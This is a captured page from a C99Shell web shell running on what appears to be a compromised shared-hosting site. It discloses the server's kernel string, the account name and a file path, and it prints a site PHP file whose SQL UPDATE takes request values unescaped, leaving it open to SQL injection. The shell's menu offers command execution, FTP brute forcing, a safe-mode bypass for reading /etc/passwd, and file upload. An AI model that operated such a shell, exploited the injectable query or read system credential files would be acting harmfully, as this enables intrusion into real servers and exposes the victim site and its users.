!C99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.4.45 

uname -a: Linux webm115.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed
Oct 26 09:50:47 UTC 2022 x86_64
 

uid=763961(ebenisteaz) gid=100(users) groups=100(users) 

Safe-mode: OFF (not secure)

/home/ebenisteaz/www/admin/includes/   drwx---r-x
Free 0 B of 0 B (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     updateorder.php (821 B)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
require("../class/config.inc.php");
require(
"../class/Database.singleton.php");
$db Database::obtain(DB_SERVERDB_USERDB_PASSDB_DATABASE);
$db->connect();
$thetable=$_POST['thetable'];
$action     mysql_real_escape_string($_POST['action']); 
  
$updateRecordsArray     $_POST['recordsArray'];
if (
$action == "updateRecordsListings"){
  
  
$listingCounter 1;
  foreach (
$updateRecordsArray as $recordIDValue) {
  
  
$query "UPDATE ".$thetable." SET orderid = " $listingCounter " WHERE id = " $recordIDValue;
  
mysql_query($query) or die('Error, insert query failed');
  
$listingCounter $listingCounter 1
  }
  
  echo 
'<pre>';
  
print_r($updateRecordsArray);
  echo 
'</pre>';
  echo 
'Si vous actualisez la page, vous verrez que les documents resteront comme vous les avez modifies.';
  }
  
 
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0158 ]--